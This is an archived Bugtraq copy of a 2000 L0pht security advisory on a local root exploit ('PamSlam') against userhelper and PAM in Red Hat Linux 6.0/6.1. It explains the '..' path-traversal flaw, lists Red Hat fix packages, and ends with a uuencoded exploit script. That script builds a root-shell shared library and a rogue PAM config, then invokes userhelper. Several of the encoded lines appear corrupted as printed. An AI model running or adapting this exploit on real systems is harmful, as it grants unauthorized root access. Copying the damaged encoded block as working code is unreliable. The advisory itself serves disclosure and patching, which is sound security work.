OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq Archives: L0pht Advisory: RH Linux 6.0/6.1, PAM and use

L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper


Subject: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper
From: Dildog (dildogL0PHT.COM)
Date: Tue Jan 04 2000 - 19:09:05 CST


                       L0pht Security Advisory

        Advisory Name: PamSlam
    Advisory Released: [01/04/00]
          Application: userhelper and PAM on Redhat Linux 6.0/6.1
             Severity: A local user can gain root access.
               Status: Vendor contacted. Fix provided by vendor.
                       Advisory released.
               Author: dildogl0pht.com
                  WWW: http://www.l0pht.com/advisories.html

Overview:

         Both 'pam' and 'userhelper' (a setuid binary that comes with the
'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
_pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
being setuid means we can get root.

Description:

        The combination of the fact that both userhelper and PAM follow ..
paths allows us to craft up a file that causes userhelper (by way of PAM) to
dlopen any shared object we want as root. The exploit is simple, and utilizes
the '-w' option of userhelper, which lets us specify a program to run with the
privileges designated by PAM. This tries to only execute programs that have
entries in /etc/security/console.apps, but since we get to specify the name,
something like ../../../tmp/myprog gets us a file open path that looks like
/etc/security/console.apps/../../../tmp/myprog. "strcat" is not a good way to
keep a filename below a directory!

        After this hurdle, PAM is called to start up the binary, and it does
the same thing, looking for the filename in /etc/pam.d. If we've placed a rogue
pam.d configuration file in /tmp/myprog, then it can be pointed to
/etc/pam.d/../../../tmp/myprog. In the pam.d configuration file, we get to pick
a few shared libraries to dlopen, so at this point, we get root.

The following exploit demonstrates this vulnerability by creating a
'rootshell library' that creates a shell when dlopened, creating a pam.d-style
configuration file, and then running userhelper with the appropriately dotted
path.

Quick solution:

        Download the fix from RedHat at:

   Intel:
   ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
   ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm

   Alpha:
   ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
   ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm

   Sparc:
   ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
   ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm

   Source packages:
   ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
   ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm

   Red Hat Linux 6.0:

   Intel:
   ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
   ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
   ftp://updates.redhat.com/6.0/i386/SysVinit-2.77-2.i386.rpm

   Alpha:
   ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
   ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
   ftp://updates.redhat.com/6.0/alpha/SysVinit-2.77-2.alpha.rpm

   Sparc:
   ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
   ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
   ftp://updates.redhat.com/6.0/sparc/SysVinit-2.77-2.sparc.rpm

   Source packages:
   ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
   ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
   ftp://updates.redhat.com/6.0/SRPMS/SysVinit-2.77-2.src.rpm
        
Exploit:

Uudecode the following script. Run the script.

begin 755 pamslam.sh
M(R$O8FEN+W-H"B,*(R!P86US;&%M("T=G5L;F5R86)I;&ET>2!I;B!2961H
M8703&EN=7-BXQ(&%N9"!004T<&%M7W-T87)T"B,9F]U;F08GD9&EL
M9&]G0&PP<&AT+F-O;0HC("`*(R!S>6YO<'-I<SH*(R`("!B;W1H("=P86TG
M(&%N9"`G=7-E<FAE;'!E<B<*&$<V5T=6ED(&)I;F%R>2!T:&%T(&-O;65S
M('=I=&=&AE"B,("`)W5S97)M;V1E+3$N,34G(')P;2D9F]L;&]W("XN
M('!A=&AS+B!3:6YC92!P86U?<W1A<G08V%L;',9&]W;B!T;PHC("`(%]P
M86U?861D7VAA;F1L97(H*2P=V48V%N(&=E="!I="!T;R!D;&]P96X86YY
M(&9I;&4;VX9&ES:RX)W5S97)H96QP97(G"B,("`8F5I;F<<V5T=6ED
M(&UE86YS('=E(&-A;B!G970<F]O="X"B,*(R!F:7Z(`HC("`($YO(&9U
M8VMI;B!I9&5A(&9O<B!A(&=O;V09FEX+B!'970<FED(&]F('1H92`N+B!P
M871H<R!I;B!U<V5R:&5L<&5R(`HC("`(&9O<B!A('%U:6-K(&9I>"X4F5M
M96UB97()W-T<F-A="<:7-N)W082!V97)Y(&=O;V0=V%Y(&]F(&-O;F9I
M;FEN9PHC("`(&$<&%T:"!T;R!A('!A<G1I8W5L87(<W5B9&ER96-T;W)Y
M+HC"B,<')O<',=&\;7D;6]M;7D86YD(&1A9&1Y+"!C=7H=&AE>2!M
M861E(&UE(&1R:6YK(&UY(&UI;&LN"IC870/B!?<&%M<VQA;2YC(#P\($5/
M1HC:6YC;'5D93QS=&1L:6(N:#X*(VEN8VQU9&4\=6YI<W1D+F^"B-I;F-L
M=61E/'-Y<R]T>7!E<RYH/IV;VED(%]I;FET*'9O:60I"GL*("`('-E='5I
M9"AG971E=6ED*"DI.PH("`<WES=&5M*"(O8FEN+W-H(BD["GT*14]&"IE
M8VAO("UN("X*"F5C:&\+64875T:%Q<=')E<75I<F5D7%QT)%!71"]?<&%M
M<VQA;2YS;R`^(%]P86US;&%M+F-O;F8*8VAM;V0-S4U(%]P86US;&%M+F-O
M;F8*"F5C:&\+6X+H*9V-C("UF4$E#("UO(%]P86US;&%M+F\+6,7W!A
M;7-L86TN8PH*96-H;R`M;B!O"IL9"`M<VAA<F5D("UO(%]P86US;&%M+G-O
M(%]P86US;&%M+F\*"F5C:&\+6X;PH*8VAM;V0-S4U(%]P86US;&%M+G-O
M"IE8VAO("UN($\*"G)M(%]P86US;&%M+F,*<FT7W!A;7-L86TN;PH*96-H
M;R!/"HO=7-R+W-B:6XO=7-E<FAE;'!E<B`M=R`N+B\N+B\N+B105T0O7W!A
M;7-L86TN8V]N9H*<VQE97`,7,*"G)M(%]P86US;&%M+G-O"G)M(%]P86US
*;&%M+F-O;F8*"``
`
end

Boing.

dildogl0pht.com

  [ For more advisories check out http://www.l0pht.com/advisories.html ]



This archive was generated by hypermail 2b27 : Tue Jan 04 2000 - 22:44:19 CST